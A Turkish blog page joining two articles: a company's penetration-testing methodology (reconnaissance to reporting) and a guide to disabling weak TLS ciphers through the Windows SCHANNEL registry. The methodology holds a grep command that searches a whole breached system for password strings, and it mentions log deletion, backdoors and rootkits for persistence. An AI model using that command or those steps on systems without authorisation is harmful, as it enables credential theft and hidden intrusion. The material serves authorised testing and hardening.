İşinin ehli bir hacker kendisine hedef olarak belirlediği sisteme sızmak için daha önce edindiği tecrübeler ışığında düzenli bir yol izler. Benzeri şekilde sızma testlerini gerçekleştiren uzmanlar da çalışmalarının doğrulanabilir, yorumlanabilir ve tekrar edilebilir olmasını sağlamak için metodoloji geliştirirler veya daha önce geliştirililen bir metodolojiyi takip ederler.

 

Metodoloji kullanımı bir kişilik olmayan sızma test ekipleri için hayati önem taşımaktadır ve sızma testlerinde daha önce denenmiş ve standart haline getirilmiş kurallar izlenirse daha başarılı sonuçlar elde edilir

 

 

Internet üzerinde ücretsiz olarak edinilebilecek çeşitli güvenlik testi kılavuzları bulunmaktadır.



Bunların başında ;


•    OWASP(Open Web Application Security Project)

•    OSSTMM(The Open Source Security Testing Methodology Manual)
•    ISSAF(Information Systems Security Assessment Framework)
•    NIST  SP800-115

 

gelmektedir. Internetten ücretsiz edinilebilecek bu test metodojileri incelenerek yapılacak güvenlik denetim testlerinin  daha sağlıklı ve tekrar edilebilir sonuçlar üretmesi  sağlanabilir.



Metodoloji hazırlanmasında dikkat edilmesi gereken en önemli hususlardan biri sızma test metodolojisinin araç tabanlı (X adımı icin Y aracı kullanılmalı gibi) olmamasına dikkat edilmesidir
.

 

 

BGA Sızma Test Metodolojisi

 

 

Sızma testlerinde ISSAF tarafından geliştirilen metodoloji temel alınmıştır.  Metodolojimiz üç ana bölümde dokuz alt bölümden oluşmaktadır.

 

 

image003

 

 



1.1 [Bilgi Toplama]



Amaç, hedef sistem hakkında olabildiğince detaylı bilgi toplamaktır. Bu bilgiler firma hakkında olabileceği gibi firma çalışanları hakkında da  olabilir. Bunun için  internet siteleri haber gruplari e-posta listeleri , gazete haberleri vb., hedef sisteme gönderilecek çeşitli paketlerin analizi  yardımcı olacaktır.

 

 

Bilgi toplama ilk ve en önemli adımlardan biridir. Zira yapılacak test bir zaman işidir ve ne kadar sağlıklı bilgi olursa o kadar kısa sürede sistemle ilgili detay çalışmalara geçilebilir.



Bilgi toplamada aktif ve pasif olmak üzere ikiye ayrılır. Google, pipl, Shodan, LinkedIn, facebook gibi genele açık kaynaklar taranabileceği gibi hedefe özel çeşitli yazılımlar kullanılarak DNS, WEB, MAIL sistemlerine yönelik detaylı araştırmalar gerçekleştirilir.


Bu konuda en iyi örneklerden biri hedef firmada çalışanlarından birine ait e-posta ve parolasının internete sızmış parola veritabanlarından birinden bulunması ve buradan VPN yapılarak tüm ağın ele geçirilmesi senaryosudur. 



Sızma testlerinde bilgi toplama adımı için  kullanılabilecek temel araçlar:

 

  • FOCA
  • theharvester
  • dns
  • Google arama motoru
  • Shodan arama motoru
  • E-posta listeleri, LinkedIn, Twitter ve Facebook

 

1.2 [Ağ Haritalama]


Amaç hedef sistemin ağ yapısının detaylı belirlenmesidir. Açık sistemler ve üzerindeki açık portlar, servisler ve servislerin hangi yazılımın hangi sürümü olduğu bilgileri, ağ girişlerinde bulunan VPN, Firewall, IPS cihazlarının belirlenmesi, sunucu sistemler çalışan işletim sistemlerinin ve versiyonlarının belirlenmesi ve tüm bu bileşenler belirlendikten sonra hedef sisteme ait ağ haritasının çıkartılması Ağ haritalama adımlarında yapılmaktadır.



Ağ haritalama bir aktif bilgi toplama yöntemidir. Ağ haritalama esnasında hedef sistemde IPS, WAF ve benzeri savunma sistemlerinin olup olmadığı da belirlenmeli ve gerçekleştirilecek sızma testleri buna göre güncellenmelidir.



Ağ Haritalama Amaçlı Kullanılan Temel Araçlar

 

  • Nmap,
  • Unicornscan

 

 

1.3 [Zafiyet/Zayıflık Tarama Süreci]



Bu sürecin amacı  belirlenen hedef sistemlerdeki açıklıkların ortaya çıkarılmasıdır. Bunun için sunucu servislerdeki bannerler ilk aşamada kullanılabilir. Ek olarak birden fazla zayıflık tarama aracı ile bu sistemler ayrı ayrı taranarak oluşabilecek false positive oranı düşürülmeye çalışılır.


Bu aşamada hedef sisteme zarar vermeycek taramalar gerçekleştirilir. Zayıflık tarama sonuçları mutlaka uzman gözler tarafından tekrar tekrar incelenmeli, olduğu gibi rapora yazılmamalıdır. Otomatize zafiyet tarama araçlar ön tanımlı ayarlarıyla farklı portlarda çalışan servisleri tam olarak belirleyememktedir.

 


Zafiyet Tarama Amaçlı Kullanılan Temel Araçlar

 

  • Nessus
  • Nexpose

·         Netsparker

 

 

2.1 [Penetrasyon(Sızma) Süreci]



Belirlenen açıklıklar için POC kodları/araçları belirlenerek denelemeler başlatılır. Açıklık için uygun araç yoksa ve imkan varsa ve test için yeteri kadar zaman verilmişse sıfırdan yazılır. Genellikle bu tip araçların yazımı için Python, Ruby gibi betik dilleri tercih edilir.



Bu adımda dikkat edilmesi gereken en önemli husus çalıştırılacak exploitlerden önce mutlaka yazılı onay alınması ve mümkünse lab ortamlarında önceden denenmesidir.


Sızma Sürecinde Kullanılan Temel Araçlar

 

 

  • Metasploit, Metasploit Pro
  • Core Impact, Immunity Canvas
  • Sqlmap
  • Fimap

 

 

2.2 [Erişim Elde Etme ve Hak Yükseltme]

 

Sızma sürecinde amaç sisteme bir şekilde giriş hakkı elde etmektir. Bu süreçten sonra sistemdeki kullanıcının haklarının arttırılması hedeflenmelidir. Linux sistemlerde çekirdek (kernel) versiyonunun incelenerek priv. escelation zafiyetlerinin belirlenmesi ve varsa kullanılarak root haklarına erişilmesi en klasik hak yükseltme adımlarından biridir.



Sistemdeki kullanıcıların ve haklarının belirlenmesi, parolasız kullanıcı hesaplarının belirlenmesi, parolaya sahip hesapların uygun araçlarla parolalarının bulunması bu adımın önemli bileşenlerindendir.



Hak Yükseltme


Amaç edinilen herhangi bir sistem hesabı ile tam yetkili bir kullanıcı moduna geçişttir.(root, administrator, system vs)


Bunun için çeşitli exploitler denenebilir.



Bu sürecin bir sonraki adıma katkısı da vardır. Bazı sistemlere sadece bazı yetkili makinelerden ulaşılabiliyor olabilir. Bunun için rhost, ssh dosyaları ve mümkünse history’den eski komutlara bakılarak nerelere ulaşılabiliyor detaylı belirlemek gerekir.

 

 

2.3 [Detaylı Araştırma]



Erişim yapılan sistemlerden şifreli kullanıcı bilgilerinin alınarak daha hızlı bir ortamda denenmesi.  Sızılan  sistemde sniffer çalıştırılabiliyorsa  ana sisteme erişim yapan diğer kullanıcı/sistem bilgilerinin elde edilmesi.


Sistemde bulunan çevresel değişkenler ve çeşitli network bilgilerinin kaydedilerek sonraki süreçlerde kullanılması.



Linux sistemlerde en temel örnek olarak grep komutu kullanılabilir.


grep parola|password|sifre|onemli_kelime -R / 



3.1 [Erişimlerin Korunması] 


Sisteme girildiğinin başkaları tarafından belirlenmemesi için bazı önlemlerin alınmasında fayda vardır.  Bunlar giriş loglarının silinmesi, çalıştırılan  ek proseslerin saklı olması , dışarıya erişim açılacaksa  gizli kanalların kullanılması(covert channel), backdoor, rootkit yerleştirilmesi vs.


3.2 [İzlerin silinmesi ]


Hedef sistemlere bırakılmış arka kapılar, test amaçlı scriptler, sızma testleri için eklenmiş tüm veriler not alınmalı ve test bitiminde silinmelidir.

 


3.3 [Raporlama]


Raporlar bir testin müşteri açısından en önemli kısmıdır.  Raporlar ne kadar açık ve detaylı/bilgilendirici olursa müşterinin riski değerlendirmesi ve açıklıkları gidermesi  de o kadar kolay olur.



Testler esnasında çıkan kritik güvenlik açıklıklarının belgelenerek sözlü olarak anında bildirilmesi test yapan takımın görevlerindendir. Bildirimin ardından açıklığın hızlıca giderilmei için çözüm önerilerinin de birlikte sunulması gerekir.



Ayrıca raporların teknik, yönetim ve özet olmak üzere üç  farklı şekilde hazırlanmasında fayda vardır.


Teknik raporda hangi uygulama/araçların kullanıldığı, testin yapıldığı tarihler ve çalışma zamanı,  bulunan açıklıkların detayları  ve açıklıkların en hızlı ve kolay yoldan giderilmesini amaçlayan tavsiyeler bulunmalıdır.

 

 

Zamanlama

 

Hedef sistemlerin kritiklik durumlarına göre sızma testlerinin zamanlaması ayarlanmalıdır. DDoS testlerinin genellikle hafta sonu ve gece yarısı gerçekleştirilmesi önerilmektedir.

 

 

Bunun haricinde diğer testlerin gün içinde veya mesai saatleri sonrası yapılması tamamen müşterinin talebine bağlı değişkenlik göstermektedir. Fakat hedef sistemi performans açısından zorlayabilecek taramalar mesai saatleri dışında yapılması tercih edilmelidir.

 

 

Exploit Denemeleri

 

Sızma testlerinin en önemli adımlarıdan biri exploiting aşamasıdır. Bu adımla hedef sistem üzerinde bulunan güvenlik zafiyetleri istismar edilir ve sisteme sızılacak yollar belirlenebilir. Test yapan firmanın kalitesinin göstergelerinden biri de bu adımıdaki başarılarıdır.

 

 

Exploit çalıştırma denemelerinde mutlaka müşteri tarafı ile koordinasyon içinde olunmalı. Aksi hale hedef sistemi ele geçirmek amacıyla çalıştırılan bir exploit hedef sistemin bir daha açılmamasına, yeniden başlamasına ya da veri kaybına sebep olabilir.

 

 

BGA olarak genellikle test yapılacak firmalara ait bilişim sistemlerinin bir kopyaları kendi lab ortamımızda kurulu ve exploit öncesi denemeler gerçekleştirilir.

 

Pentest Çalışmasının Kayıt Altına Alınması

 

 

Bazı durumlarda hedef sistemde istenmeyen, beklenmeyen sonuçlar yaşanabilir. Testler esnasında hedef sistemden verilerin silinmesi, test yapılan ağın çökmesi, veya müşteri bilgilerinin internet ortamına sızması gibi. Bu gibi durumlarda sızma testlerini gerçekleştiren firmanın kendini sağlama alması açısından tüm sızma test adımlarının raw paket olarak kayıt altına alması önemlidir. Yaşanabilecek herhangi bir olumsuz durumda kayıt altına alınan paketlerden problem çözümü kolaylıkla sağlanabilir.

 

 

Pentest yapacak firma ne kadar güvenili olsa da-aranizda muhakkak imzalı ve maddeleri açık bir NDA olmalı- siz yine de kendinizi sağlama alma açısından firmanın yapacağı tüm işlemleri loglamaya çalışın.

 

Bunu nasıl yaparsınız? Firmanın pentest yapacağı ip adres bilgilerini isteyerek bu ip adreslerinden gelecek tum trafiği Snort veya benzeri bir yazılım kullanarak loglayabilirsiniz.

 

 

●     Özellikle web trafiği -ki en kirik bilgiler burada çıkacaktır- Snort ile cok rahatlıkla sonradan incelendiğinde anlaşılacak şekilde kaydettirilebilir.

 

 

Bunun için Snort gibi açık kaynak kodlu araçlar kullanılabilir. BGA olarak gerçekleştirdiğimiz sızma testlerinde müşteri talep ederse bu tip bir altyapıyı sağlamaktayız.

 

Sızma Test Kalitesinin Ölçümü

 

 

Dikkat edilmesi gereken en önemli husus, firmanın yaklaşımıdır. Genellikle firmalar sızma testi yerine zayıflık tarama ile yetinmek istemektedir ki günümüzde zayıflık tarama işlemlerinin %90'ı Nessus, Netsparker, Nmap gibi yazılımlar kullanılarak gerçekleştirilebilmektedir.  Önemli olan sızma testlerinde otomatize araçların ortaya çıkardığı bulguların teker teker incelenerek aralarında ilişki kurulabilmesi ve hedef sisteme sızmaya çalışmaktır.

 

 

Açıklığı bulup bunu raporlamak çoğu firma için yeterli olsa da gerçek bir sızma testi raporunda bulunan açıklık tüm yönleriyle incelenmeli ve hedef sisteme sızılabilirliğin gösterilmesidir.

 

Buna örnek olarak http://www.bga.com.tr/ornek_pentest_raporu.pdf adresindeki BGA sızma test sonuç raporu incelebilir.

 

 

Raporlama

 

 

Sızma testlerinin en önemli bileşenlerinden biri raporlamadır. Ticari açıdan yaklaşıldığında pentest yaptıran müşteri rapora para vermektedir. Dolayısıyla pentest raporunun olabildiğince detaylı ve müşteriyi doğru yönlendirecek nitelikte olması gerekir. Doğrudan otomatik analiz ve tarama araçlarının çıktılarını rapora eklemek müşterinin karşılaşmak istemediği durumların başında gelmektedir.

 

Raporun İletimi

 

 

 

Raporun mutlaka şifreli bir şekilde müşteriye ulaştırılması gerekir. Raporu açmak için gerekli olan parolanın e-posta harici başka bir yöntemle müşteriye ulaştırılabilir. Sık tercih edilen yöntem SMS kullanımıdır.

Bulguların Saklanması

 

 

Sızma teslerini yapan ekiplerin kullandıkları bilişim sistemleri ve sızma test sonçlarının saklandığı online, fiziksel ortamların koruma altında olması gerekmektedir. Aksi halde hedef sistemlere ait çok hassas bilgiler başkalarının eline geçebilir.

Bulguları saklamak için Truecrypt gibi disk şifreleme yazılımları kullanılabilir.

 

Anlık Acil Zafiyet Bildirimi

 

 

Bazı durumlarda hedef sisteme sızılacak bir yol, giriş kapısı bulunduğunda vakit geçirmeden müşteri detaylı olarak bilgilendirilmeli ve geçmişe yönelik adli bilişim analizi yapması önerilmelidir. Aksi halde pentest çalışması öncesi birilerinin sızdığı sistemden pentest sürecinde bir zarar gelirse pentest çalışmasını yapan firma zor durumda kalabilir.

 

Doğrulama Testleri

 

 

Doğrulama testleri yeni bir pentest çalışması gibi değildir ve ana pentest çalışmasının ayrılmaz bir parçasıdır. Doğrulama testleri için ek bir ücret talep edilmez.

 

Doğrulama testlerinde çalışmayı gerçeklştiren firmadan raporda yazılan tüm açıklıkların kontrol etmesi istenir. Bu esnada yeni açıklıklar incelenmez.

 

Sızma Test Çalışması Sonrası Yapılması Gerekenler

 

 

Pentest yaptırmak ne kadar önemliyse sonuçlarını değerlendirip aksiyon almak çok daha önemlidir.Malesef ki yaygın olarak yapılan yanlış sadece pentest yapıp raporu incelemek oluyor.

 

Pentest sonrası açıklıkların kapatılmaması ve bir sonraki pentestde aynı açıklıkların tekrar çıkması sık karşılaşılan bir durumdur.

 

 

●     Pentest raporlarının üst yönetimle paylaşılıp yönetim desteğinin alınması

●     Sonuçlarının basit açıklıklar olarak değil, bir risk haritası kapsamında yönetime sunulması(bu açıklık hackerlar tarafından değerlendirilirse şu kadar kaybımız olur gibisinden)

●     Raporu detaylıca inceleyip her bir açıklığın kimin ilgi alanına girdiğinin belirlenmesi

●     Sistem yöneticileri/yazılımcılarla toplantı yapıp sonuçların paylaşılması

●     Açıklıkların kapatılmasının takibi

●     Bir sonraki pentestin tarihinin belirlenmesi

 

 

 

Sızma Testlerinde Kullanılan Araçlar:

 

 

Öncelikle sızma test kavramının araç bağımsız olduğunu belirtmek gerekir. Bu konudaki yazılımlar

 

 

Açık kodlu bilinen çoğu pentest yazılımı Backtrack güvenlik CDsi ile birlikte gelir. Bu araçları uygulamalı olarak öğrenmek isterseniz Backtrack ile Penetrasyon testlerieğitimine kayıt olabilirsiniz.

 

 

Ticari Pentest Yazılımları: Immunity Canvas, Core Impact, HP Webinspect, Saint Ssecurity Scanner

 

 

Sızma Testleri Konusunda Uzmanlık Kazanma

 

 

Pentest konusunda kendinizi geliştirmek için öncelikle bu alana meraklı bir yapınızın olmasın gerekir. İçinizde bilişim konularına karşı ciddi merak hissi , sistemleri bozmaktan korkmadan kurcalayan bir düşünce yapınız yoksa işiniz biraz zor demektir.

 

Zira pentester olmak demek başkalarının düşünemediğini düşünmek, yapamadığını yapmak ve farklı olmak demektir.

 

Bu işin en kolay öğrenimi bireysel çalışmalardır, kendi kendinize deneyerek öğrenmeye çalışmak, yanılmak sonra tekrar yanılmak ve doğrsunu öğrenmek. Eğitimler bu konuda destekci olabilir. Sizin 5-6 ayda katedeceğiniz yolu bir iki haftada size aktarabilir ama hiçbir zaman sizi tam manasıyla yetiştirmez, yol gösterici olur.

 

 

Pentest konularının konuşulduğu güvenlik listelerine üyelik de sizi hazır bilgi kaynaklarına doğrudan ulaştıracak bir yöntemdir.

 

Linux öğrenmek, pentest konusunda mutlaka elinizi kuvvetlendirecek, rakiplerinize fark attıracak bir bileziktir. Bu işi ciddi düşünüyorsanız mutlaka Linux bilgisine ihtiyaç duyacaksınız.

 

 

Sızma Testleri Konusunda Verilen Eğitimler

 

●     Bilgi Güvenliği AKADEMİSİ Pentest Eğitimleri

●     Ec-Council Pentest Eğitimleri

●     SANS Pentest Eğitimleri

●     Offensive Security Pentest Eğitimleri

 

 

Kısa Uzunluktaki Cipherlardan Kaynaklanan Zafiyetlerin Giderilmesi

$
0
0

Makaleme başlamadan önce bu makalenin hazırlanmasında bana yardımcı olan değerli arkadaşım Selin Sökücü' ye teşekkür ediyorum.

SSL Secure Socket Layer Protokolü Netscape tarafından, internet üzerinde web sunucular ve tarayıcıların güvenli haberleşmeleri için geliştirilmiştir. Zaman içinde daha da geliştirierek TLS - Transport Layer Security olarak adlandırılmıştır. SSL Protokolü'nün ana hedefi kişisel gizlilik ve güvenilirlik sağlamaktır. Bu protokol ile istemci (client) ve sunucu (server) arasında trafik şifrelenir, şifreleme için cipher adı verilen anahtarlar kullanılır. Kısa uzunluktaki olan anahtarlarla (<128 bit) şifrelenmiş olan verilerin kırılıp okunabilmesi, daha uzun anahtarla şifrelenmiş olan verinin kırılıp okunmasından çok daha basittir. Güvenli veri iletişimi sağlamak için uzunluğu kısa anahtarların kullanılmaması gerekir. Yazımızda istemci ve sunucu tarafında düşük güvenlikli, uzunluğu kısa anahtarların kapatılmasını anlatılacaktır.

 

Makalemize başlamadan önce sizlere makale içerisinde geçecek olan bir takım terimlerin tanımlarını yapmak istiyorum.

 

Tanımlar;

 

Plaintext:Şifrelenmemiş asıl metin.

 

Ciphertext: Bir anahtarla şifrelenmiş metin.

 

Cipher:Şifreleme ve/veya şifre çözmede kullanılan anahtara Cipher denir. Cipher’lar birçok farklı şekilde kategorilere ayrılabilirler.

 

·         Block Cipher:Şifreleme algoritmalarında kullanılan bir yöntem olan blok şifreleme, açık mesajın (plain text) belirli uzunluklarda bloklara bölünmesi ile çalışır.

 

·         Stream Cipher:Bloklar halinde çalışmayıp, devam eden semboller üzerinde çalışan cipherlara stream ciphers denir.

 

Cipher’lar şifreleme anahtarlarının uzunluklarına göre üçe ayrılmaktadır.

 

·         Düşük (Low): 128 bitten daha kısa olan cipherlardır.

·         Orta (Medium): 128 bit uzunluğunda olan cipherlardır.

·         Yüksek (High): 128 bitten daha uzun olan cipherlardır.

 

Anahtarlama yöntemleri ikiye ayrılır:

 

·         Simetrik Anahtarlama (symmetric key algorithms):Şifrelemede ve şifre çözmede aynı anahtar kullanılır. Bu anahtarlama türünde, anahtar alıcı ve gönderici tarafından bilinmeli ve başka kimse tarafından bilinmemelidir.

 

·         Asimetrik Anahtarlama (asymmetric key algorithms):Şifrelemede ve şifre çözmede farklı anahtar kullanılır.  Bunlar public key (açık anahtar) ve private key (gizli-kapalı anahtar)’lerdir. Private key public keyden öğrenilemez ve böylece şifrelemenin de güvenliği sağlanmış olur.

 

 

Üçlü El Sıkışması (3-way-handshake): İstemci bilgisayarın HTTPS protokolü üzerinden sunucu sisteme bağlanması Üçlü Tokalaşma (3 way handshake) yöntemiyle gerçekleştirilmektedir. Buna göre İstemci bilgisayar bağlantı kurmak istediği sunucuya içinde kendini tanıtıcı bilgileri bulunduran bir SYN (Synchronize) paketi gönderir. Sunucu SYN paketini aldığında alındı onayı olan ACK (Acknowledgement) paketiyle birlikte kendini tanıtıcı bir SYN paketi gönderir. İstemci bilgisayarın sunucudan gelen SYN+ACK paketini aldığını son adımda göndereceği ACK paketiyle Üçlü Tokalaşma tamamlanır ve veri akışı başlar.

 

 

 

image001

 

 

Şekil – 1

Network tarafında giden ve gelen paketleri incelemek için Wireshark yazılımını kullanacağız.( http://www.wireshark.org/download.html)

Wireshark programından üçlü el sıkışma paketlerini incelemek istersek:

1. adım olan SYN paketinin yollanması (istemci):

 

 

image002

Şekil – 2

 

 

2. adım olan SYN-ACK paketinin yollanması (sunucu):

 

 

image003

Şekil – 3

 

 

3. adım olan ACK paketinin yollanması (istemci):

 

 

image004

Şekil – 4

 

 

Cipher Açıklaması:

 

Cipher’ların isimlerinin açıklamalarını gösteren tablo aşağıdaki gibidir.

Kx: Key Exchange Algorithm.

Au: Authentication Algorithm.

Enc: Encryption.

Mac: Message Authentication Code Algorithm; Mesajın bütünlüğünü ve değiştirilmediğini kontrol etmek için kullanılır. Bütünlük sayesinde mesaj üzerinde yapılan rastlantısal ve kasıtlı mesaj değişiklikleri algılanır. Mesajın değiştirilmemesi kontrolü sayesinde ise mesajı gönderen doğrulanmış olur.

 

 

Adı

Protokol

Kx

Au

Enc

Bits

Mac

TLS_RSA_WITH_NULL_MD5

TLS

RSA

RSA

NULL

0

MD5

TLS_RSA_WITH_NULL_SHA

TLS

RSA

RSA

NULL

0

SHA

TLS_RSA_WITH_RC4_128_MD5

TLS

RSA

RSA

RC4_128

128

MD5

TLS_RSA_WITH_RC4_128_SHA

TLS

RSA

RSA

RC4_128

128

SHA

TLS_RSA_WITH_DES_CBC_SHA

TLS

RSA

RSA

DES_CBC

56

SHA

TLS_RSA_WITH_3DES_EDE_CBC_SHA

TLS

RSA

RSA

3DES_EDE_CBC

168

SHA

TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA

TLS

DH

DSS

DES40_CBC

40

SHA

TLS_DH_DSS_WITH_DES_CBC_SHA

TLS

DH

DSS

DES_CBC

56

SHA

TLS_DH_DSS_WITH_3DES_EDE_CBC_SHA

TLS

DH

DSS

3DES_EDE_CBC

168

SHA

TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA

TLS

DH

RSA

DES40_CBC

40

SHA

TLS_DH_RSA_WITH_DES_CBC_SHA

TLS

DH

RSA

DES_CBC

56

SHA

TLS_DH_RSA_WITH_3DES_EDE_CBC_SHA

TLS

DH

RSA

3DES_EDE_CBC

168

SHA

TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA

TLS

DHE

DSS

DES40_CBC

40

SHA

TLS_DHE_DSS_WITH_DES_CBC_SHA

TLS

DHE

DSS

DES_CBC

56

SHA

TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA

TLS

DHE

DSS

3DES_EDE_CBC

168

SHA

TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA

TLS

DHE

RSA

DES40_CBC

40

SHA

TLS_DHE_RSA_WITH_DES_CBC_SHA

TLS

DHE

RSA

DES_CBC

56

SHA

TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA

TLS

DHE

RSA

3DES_EDE_CBC

168

SHA

TLS_DH_Anon_EXPORT_WITH_RC4_40_MD5

TLS

DH

Anon

RC4_40

40

MD5

TLS_DH_Anon_WITH_RC4_128_MD5

TLS

DH

Anon

RC4_128

128

MD5

TLS_DH_Anon_EXPORT_WITH_DES40_CBC_SHA

TLS

DH

Anon

DES40_CBC

40

SHA

TLS_DH_Anon_WITH_DES_CBC_SHA

TLS

DH

Anon

DES_CBC

56

SHA

TLS_DH_Anon_WITH_3DES_EDE_CBC_SHA

TLS

DH

Anon

3DES_EDE_CBC

168

SHA

TLS_RSA_WITH_AES_128_CBC_SHA

TLS

RSA

RSA

AES_128_CBC

128

SHA

TLS_DH_DSS_WITH_AES_128_CBC_SHA

TLS

DH

DSS

AES_128_CBC

128

SHA

TLS_DH_RSA_WITH_AES_128_CBC_SHA

TLS

DH

RSA

AES_128_CBC

128

SHA

TLS_DHE_DSS_WITH_AES_128_CBC_SHA

TLS

DHE

DSS

AES_128_CBC

128

SHA

TLS_DHE_RSA_WITH_AES_128_CBC_SHA

TLS

DHE

RSA

AES_128_CBC

128

SHA

TLS_DH_Anon_WITH_AES_128_CBC_SHA

TLS

DH

Anon

AES_128_CBC

128

SHA

TLS_RSA_WITH_AES_256_CBC_SHA

TLS

RSA

RSA

AES_256_CBC

256

SHA

TLS_DH_DSS_WITH_AES_256_CBC_SHA

TLS

DH

DSS

AES_256_CBC

256

SHA

TLS_DH_RSA_WITH_AES_256_CBC_SHA

TLS

DH

RSA

AES_256_CBC

256

SHA

TLS_DHE_DSS_WITH_AES_256_CBC_SHA

TLS

DHE

DSS

AES_256_CBC

256

SHA

TLS_DHE_RSA_WITH_AES_256_CBC_SHA

TLS

DHE

RSA

AES_256_CBC

256

SHA

TLS_DH_Anon_WITH_AES_256_CBC_SHA

TLS

DH

Anon

AES_256_CBC

256

SHA

TLS_DHE_DSS_EXPORT1024_WITH_DES_CBC_SHA

TLS

DHE

DSS

DES_CBC

56

SHA

TLS_DHE_DSS_WITH_RC4_128_SHA

TLS

DHE

DSS

RC4_128

128

SHA

 

Client Tarafındaki Cipherların Ayarlanması:

 

SSL (Secure Sockets Layer) Transport katmanı için Uygulama katmanında, anahtar değişimi için asimetrik, gizlilik için simetrik şifreleme kullanan, network üzerindeki iletişim güvenliğini amaçlayan kriptografi protokolüdür. Network üzerinden gönderilen kişisel bilgilerin güvenliği sadece SSL’i aktif ederek sağlanamaz. SSL en az 3 protokol (SSLv2, SSLv3 ve TLSv1) ve farklı güçlerde şifreleme algoritmaları bulundurur. Bu şifreleme algoritmalarının bir kısmı bugün ciddi kullanımlar için yeterince güçlü değildir. SSL üçlü el sıkışması sırasında client ve server kullanılacak olan cipher konusunda pazarlık yaparlar. Client kendisinin kullanabildiği cipherların bir listesini server’a gönderir ve server da bu listeden kendisinin de kullanabildiği bir tanesini seçer ve client’a gönderir. Bir değişiklik yapılmadığı durumlarda düşük güvenlikli cipherların kullanımına imkan sağlanmış olabilir.

 

Cipher listesi paylaşımı ve tercih edilen cipher’ın wireshark sayesinde alınan ekran görüntüleri aşağıdaki gibidir.

 

1. adım, Client Hello ve Client Cipher Listesi

 

image005

Şekil – 5

 

 

2.  adım, Server Hello ve Tercih edilen Cipher Suit

 

 

image006

Şekil – 6

 

Ve 3. Adım Client Key Exchange

 

 

image007

Şekil – 7

 

Microsoft tabanlı sistemlerde, kullanılacak Cipherları schannel.dll ile kontrol edebiliriz. Schannel.dll, Internet Explorer 3.x ve 4.x için kullanılan ve 128-bit güçlü şifreleme sağlayan dynamic link library’dir.

 

 

Değişiklik yapılmadığı durumda, aşağıdaki tabloda gösterildiği şekilde cipher önceliği vardır:

 

 

 

image008

Şekil – 8

 

 

Client tarafında zayıf cipher (< 128 bit) kullanılmasını engellemek için schannel.dll üzerinden değişiklik yapmamız gerekir. Schannel’da değişiklik yapmak için Registry Editor (regedit)çalıştırılarak

 

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL dalına gelinir.

 

Low Cipher’ların, Düşük güvenlikliProtokol ya da hash’lerin, kullanılmasını engellemek için, disable edilmesi istenilen dizinin Client dosyasının içerisine sağ tıklanarak yeni DWORD yaratılır, DWORD’ün adı Enabled olarak değiştirilir ve değeri 0x00000000 yapılır.  Cipher enable edilmek isteniyorsa da DWORD değeri 0x00000001 yapılır.

 

 

image009

Şekil – 9

 

 

image010

Şekil – 10

 

 

image011

Şekil – 11

 

 

Ayrıca, aynı işlem .reg dosyası hazırlayarak da yapılabilir. Bu sayede, hem değişikliklerden önceki durumların yedekleri alınabilir, hem de değişikliklerin tek tek yapmak yerine topluca yapılmasına olanak sağlanır.

 

Bunun için SCHANNEL’a sağ tıklanıp Export seçeneği seçilir. Dosya adı verildikten sonra kaydedilir. Yaratılan dosyaya sağ tıklanıp edit seçilirse, aşağıdaki gibi schannel’in içeriğinin ve durumlarının bulunduğu notepad sayfası açılır.

 

 

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL]

"EventLogging"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\DES 56/56]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\NULL]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC2 128/128]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC2 40/128]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC2 56/128]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 128/128]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 40/128]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 56/128]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 64/128]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\Triple DES 168/168]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Hashes]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Hashes\MD5]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Hashes\SHA]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\KeyExchangeAlgorithms]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\KeyExchangeAlgorithms\Diffie-Hellman]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\KeyExchangeAlgorithms\PKCS]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\Multi-Protocol Unified Hello]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\Multi-Protocol Unified Hello\Client]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\Multi-Protocol Unified Hello\Server]

